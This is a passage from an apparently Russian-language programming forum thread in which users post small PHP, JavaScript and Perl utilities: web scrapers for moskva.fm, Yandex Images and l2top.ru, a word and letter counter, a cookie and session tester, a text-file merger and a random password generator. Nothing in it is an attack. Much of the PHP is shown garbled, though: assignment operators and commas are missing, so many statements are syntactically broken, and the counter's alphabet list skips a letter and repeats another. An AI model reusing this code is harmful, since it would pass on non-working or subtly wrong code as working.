    preg_match_all('#<a href="http://www.moskva.fm/artist/(.*?)/song_([0-9]{1,})" class="song">(.*?)</a>#isu'curl_open('http://www.moskva.fm/search.html?only=song&searchstr='.urlencode((string)$_POST['data'])), $find);
    $len count($find[2])-1;
    $out = array();
    set_time_limit(0);
    ob_end_clean();
    echo 
    '<xmp>';
    for(
    $i=0;$i<$len;$i++) {
    echo
    '===================================================
    '
    .$find[1][$i].' - '.strip_tags($find[3][$i])."\n--\n".id_txt($find[2][$i]);
    }
    }
    ?>
     
  14. 5w17ch3r

    5w17ch3r Member

    Joined:
    1 Dec 2008
    Messages:
    79
    Likes Received:
    11
    Reputations:
    0
    Написал для себя небольшой скрипт на php, подсчитывающий количество букв, слов и символов в тексте. Может кому пригодится.

    PHP:
    <center>
    <form method="POST">
        <textarea name="text" rows="10" cols="40">Text Here</textarea>
        <br/><br/>
        <input type = "submit" value = "Count"/>
    </form>

    <?php
        
    if (isset($_POST['text'])) {
            
    $string $_POST['text'];
            
    $string trim($string);
            echo 
    "Количество слов: ".str_word_count($string)."<br/>";
            
    $string_le str_replace(array(' ','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','А','Б','В','Г','Д','Е','Ё','Ж','З','И','Й','К','Л','М','Н','О','П','Р','С','Т','У','Ф','Х','Ц','Ч','Ш','Щ','Ъ','Ы','Ь','Э','Ю','Я','а','б','в','г','д','е','ё','ж','з','и','й','к','л','м','н','о','п','р','с','т','у','ф','ч','ц','ч','ш','щ','ъ','ы','ь','э','ю','я'),"",$string_le);
            
    $total mb_strlen($string,"utf8") - mb_strlen($string_le,"utf8");
            echo 
    "Количество букв: ".$total."<br/>";
            
    $string str_replace(" ","",$string);
            echo 
    "Количество символов (без пробелов): ".mb_strlen($string,"utf8");
        }
    ?>
    </center>
     
  15. AdReNa1!Ne

    AdReNa1!Ne Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    70
    Likes Received:
    105
    Reputations:
    14
    Небольшой скрипт, реализующий проверку работоспособности cookies и sessions и очищающий cookies.
    PHP:
    <?php
    $site
    ="domain.com"// домен или ip
    $script="test.php"// имя скрипта
    if(isset($_GET['cookies_test']))
    {
        if(
    $_GET['cookies_test']==1)
        {
            
    setcookie('test''1'time()+3600,'/','.'.$site);
            
    header("Location: http://".$site."/".$script."?cookies_test=2");
            die();
        }
        else if(
    $_GET['cookies_test']==2)
        {
            if(
    $_COOKIE['test']==1)
                echo 
    'Cookies works';
            else
                echo 
    'Cookies doesn\'t work';
            echo 
    "<br /><a href='?'>Back</a>";
        }
    }
    else if(isset(
    $_GET['sessions_test']))
    {
        
    session_start();
        if(
    $_GET['sessions_test']==1)
        {
            
    $_SESSION['test']='1';
            
    header("Location: http://".$site."/".$script."?sessions_test=2");
            die();
        }
        else if(
    $_GET['sessions_test']==2)
        {
            if(
    $_SESSION['test']==1)
                echo 
    'Sessions works';
            else
                echo 
    'Sessions doesn\'t work' ;
            
    session_destroy();
            echo 
    "<br /><a href='?'>Back</a>";
        }
    }
    else if(
    $_GET['clear_cookies']==1)
    {
        
    $cookies=array_keys($_COOKIE);
        
    $result="";
        for(
    $i=0;$i<count($cookies);$i++)
        {
            
    setcookie($cookies[$i], ''time()-3600,'/','.'.$site);
            
    $result.="Cookie '$cookies[$i]' cleared<br />";
        }
        if(
    $result=="")
        {
            
    $result.= "Cookies doesnt exist!";
        }
        echo 
    $result;
        echo 
    "<br /><a href='?'>Back</a>";
    }
    else
    {
        echo 
    "<b>1.</b> <a href='?cookies_test=1'>Check cookies</a><br />";
        echo 
    "<b>2.</b> <a href='?sessions_test=1'>Check sessions</a><br />";
        echo 
    "<b>3.</b> <a href='?clear_cookies=1'>Clear cookies</a><br />";
    }
    ?>
     
  16. skrutcher

    skrutcher New Member

    Joined:
    17 Jul 2011
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    Парсер картиночной выдачи яндекса.

    Задаем текст для запроса и сколько нужно картинок.
    на выходе получаем ссылку на изображение и комментарий к нему..
    PHP:
    <form action="" method="post">
    Запрос:<input type="text" name="text"><br>
    Сколько:<input type="text" name="num"><br>
    <button>ok</button>
    </form>
    <?
    if(isset($_POST['text']) and isset($_POST['num'])){
      $text=str_replace(" ","+",trim($_POST['text']));
      $n=intval($_POST['num']);
      $ns=ceil(($n/20));
      for($i=0;$i<$ns;$i++){
      $str=file_get_contents("http://images.yandex.ru/yandsearch?p=".$i."&text=".$text."&nl=1&rpt=image&ed=1");
      preg_match_all('|<ul class="b-image-info">(.*?)</ul>|sui',$str,$proxy);  

       foreach($proxy[0] as $a){
          preg_match('|img_url=(.*?)&from|sui',$a,$d);
          preg_match('|<li class="text">(.*?)</li>|sui',$a,$s);
          $arr=array('img_url=','&from');
          $url=str_replace($arr,'',urldecode($d[0]));
          $text=htmlspecialchars(strip_tags($s[0]));
          echo $text.'<br>'.$url.'<hr>';
        $j++;
        if($j==$n){
          exit();
        }
       }
      }
    }
    ?>
    (c) xhugo
     
    #1096 skrutcher, 5 Oct 2011
    Last edited: 5 Oct 2011
  17. energ77

    energ77 New Member

    Joined:
    17 Jul 2010
    Messages:
    54
    Likes Received:
    4
    Reputations:
    0
    Объединение текстовых файлов

    Здравствуйте, скрипт писал для себя , но решил поделиться с людом :)

    В целом скрипт обедняет текст с любого количества текстовых фалов в 1 тхт.

    Текст кидать в папку text

    если текста будет слишком много добавить в начало скрпта set_time_limit(0)

    PHP:
    <?php

    chdir
    ('text');

    $diropendir(".");


    while (
    $file readdir ($dir)){
        if (
    $file!="." and $file!="..")    $filecat[$a]= $file;
        echo 
    $filecat[$a].": ".pathinfo($filecat[$a], PATHINFO_EXTENSION)."<br>";
        
    $a++;
    }

    for(
    $i=0;$i<count($filecat);$i++){
        
    $textfile($filecat[$i]);
        for (
    $a=0$a<count($text); $a++){
            
    $united_text.= $text[$a];
        }    

    }

    chdir('..');
    opendir(".");

    $fpfopen('united_text.txt','w+');

    fwrite ($fp$united_text);



    ?>

     
    #1097 energ77, 6 Oct 2011
    Last edited by a moderator: 6 Oct 2011
  18. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,543
    Likes Received:
    168
    Reputations:
    99
    генератор паролей

    генератор паролей
    PHP:
    <html
    <
    head
         <
    script
         var 
    length=8
         var 
    count=10
         var 
    mode=0
         var 
    http createRequestObject(); 

         function 
    PasGenCountHTML(chars,length,count) { 
           
    document.write("<ol>"); 
           for (
    j=0;j<count;j++) 
             
    document.write("<li><samp>"+PasGenHTML(chars,length)+"</samp>"); 
           
    document.write("</ol>"); 
         } 

         function 
    PasGenHTML(chars,length) { 
           var 
    res=""
           var 
    r
           var 
    i
           for (
    i=1;i<=length;i++) { 
             
    r=Math.floor(Math.random()*chars.length); 
             
    res=res+chars.substring(r,r+1); 
           }      
           
    res res.replace("&","&"); 
           
    res res.replace(">",">"); 
           
    res res.replace("<","<"); 
           return 
    res 
         


         
    </script> 
    </head> 
    <style> 
    .block { 
         float: left; 
         width: 96%; 
         border: 0px solid black; 
         padding: 10px; 
         margin: 5px; 

    #about { 
         padding: 10px; 

    #help { 
         padding: 10px; 

    #handmade { 
         border: 1px solid black; 
         padding: 10px; 
         margin: 5px; 

    #storage { 
         border: 1px solid black; 
         padding: 10px; 
         margin: 5px; 

    </style> 
    <body> 
    <div class="block"> 
    <div class="title">Создание своего пароля</div> 
    <div class="list"> 
    <form name="f" method="POST" action=""> 
    <br> 
    Здесь вы можете сами создать пароль любой длины и любой сложности.<br> 
    Символы:<br> 
    <input type="text" name="chars" value="1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" style="width:150px;"><br> 
    Варианты: 
    <script> 
    function Check() { 
         f.chars.value=''; 
         if (f.Csigns.checked) f.chars.value=f.chars.value+'!"№;%:?*()_+=-~/\\<>,.[]{}'; 
         if (f.Cnum.checked) f.chars.value=f.chars.value+'1234567890'; 
         if (f.Cbig.checked) f.chars.value=f.chars.value+'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; 
         if (f.Csmall.checked) f.chars.value=f.chars.value+'abcdefghijklmnopqrstuvwxyz'; 
        } 
    </script> 
           <br><input type="checkbox" name="Csmall" onclick="Check();" checked>Маленькие буквы 
           <br><input type="checkbox" name="Cbig" onclick="Check();" checked>Заглавные буквы 
           <br><input type="checkbox" name="Cnum" onclick="Check();" checked>Цифры 
           <br><input type="checkbox" name="Csigns" onclick="Check();">Знаки 
           <br> 
               Длина пароля: 
           <input type=text name=length size=5 value=10><br> 
               Количество паролей: 
           <input type=text name=count size=5 value=10><br><br> 
           <br> 
           <input type="button" value="Создать пароль!" onclick=" 
    document.all.YOURS.innerHTML='Вот список ваших паролей:<br>'; 
    c = f.count.value; 
    for (i=1;i<=c;i++) 
           document.all.YOURS.innerHTML+=i+'. <samp>'+PasGenHTML(f.chars.value,f.length.value)+'</samp><br>'; 
    "> 
           </form>                      

    <div class="title">Резульат</div> 
    <p ID="YOURS">Здесь появится список паролей, когда вы нажмете "Создать пароль!".<br> 
    Например:<br> 
    <script> 
         for (j=1;j<=0;j++) 
           document.write(j+". <samp>"+PasGenHTML("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890",10)+"</samp><br>"); 
    </script> 
    </p> 

    </div> 
    </body> 
    </html>
     
  19. emmy

    emmy Member

    Joined:
    12 Oct 2009
    Messages:
    76
    Likes Received:
    17
    Reputations:
    8
    Парсер url'ов l2top.ru
    Была тут темка, пока не перенесли. И кому-то было не стыдно за такое деньги просить
    Code:
    #!/usr/bin/perl
    
    use utf8;
    use Encode;
    use WWW::Mechanize;
    
    my $www = WWW::Mechanize->new;
    
    $www->agent_alias( 'Windows IE 6' );
    $www->get('http://l2top.ru/');
    $www->follow_link( text => '50' );
    
    do
    {
      print encode_utf8($_->text), "\n"
        for $www->find_all_links( text_regex => qr'^http://.'i );  
    }
    while $www->follow_link( text_regex => qr'следующая'i );
    
     
  20. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    388
    Likes Received:
    169
    Reputations:
    65
    Наверное самый короткий (паковал как мог) яваскрипт-транслиттер. Кстати вот этот текст написан именно через него :D. Легко и просто можно встроить в любой форум, форму ответа, чат итд.

    Код: http://pastebin.com/pVp0es9B
    Демо: http://zjelinska.xf.cz/translit.htm
     
Loading...